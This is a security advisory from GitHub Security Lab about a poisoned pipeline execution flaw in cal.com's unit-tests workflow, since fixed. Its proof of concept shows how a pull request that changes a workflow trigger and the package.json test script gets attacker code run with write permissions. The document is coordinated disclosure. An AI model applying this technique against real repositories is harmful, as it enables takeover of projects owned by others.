Coordinated Disclosure Timeline
- 2024-07-12: Reported through GitHub’s Private Vulnerability Reporting (PVR).
- 2024-07-23: Fix is merged.
Summary
The unit-tests.yml
GitHub’s workflow is vulnerable to arbitrary code execution.
Project
cal.com
Tested Version
Latest commit at the time of reporting.
Details
Poisoned Pipeline Execution on unit-tests.yml
(GHSL-2024-163
)
The unit-tests.yml
workflow runs when the crowdin.yml
workflow completes. Even though the Crowdin
workflow runs on push
event, an attacker could send a PR which could change the trigger event to pull_request
so that it would trigger the unit-tests
workflow.
Considering that, the unit-tests
workflow checks out untrusted code:
- uses: ./.github/actions/dangerous-git-checkout
And then runs commands such as yarn test
that could be poisoned by an attacker able to change the package.json
file.
The unit-tests
workflow runs with full-write permissions and therefore an attacker could be able to take over the repository.
PoC
Create a new Pull Request with two changes:
- Change
crowdin.yml
to:
name: Crowdin Action
on:
pull_request:
jobs:
trigger:
runs-on: ubuntu-latest
steps:
- run: echo "Triggered"
- Change
package.json
scripts section to include a new script fortest
:
...
"scripts": {
...
"test": "echo PWNED",
...
},
...
Impact
The issue may lead to repository takeover.
Resources
- CodeQL for JavaScript - Expression injection in Actions
- Keeping your GitHub Actions and workflows secure Part 2: Untrusted input
- Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests
Credit
This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).
Contact
You can contact the GHSL team at securitylab@github.com
, please include a reference to GHSL-2024-163
in any communication regarding this issue.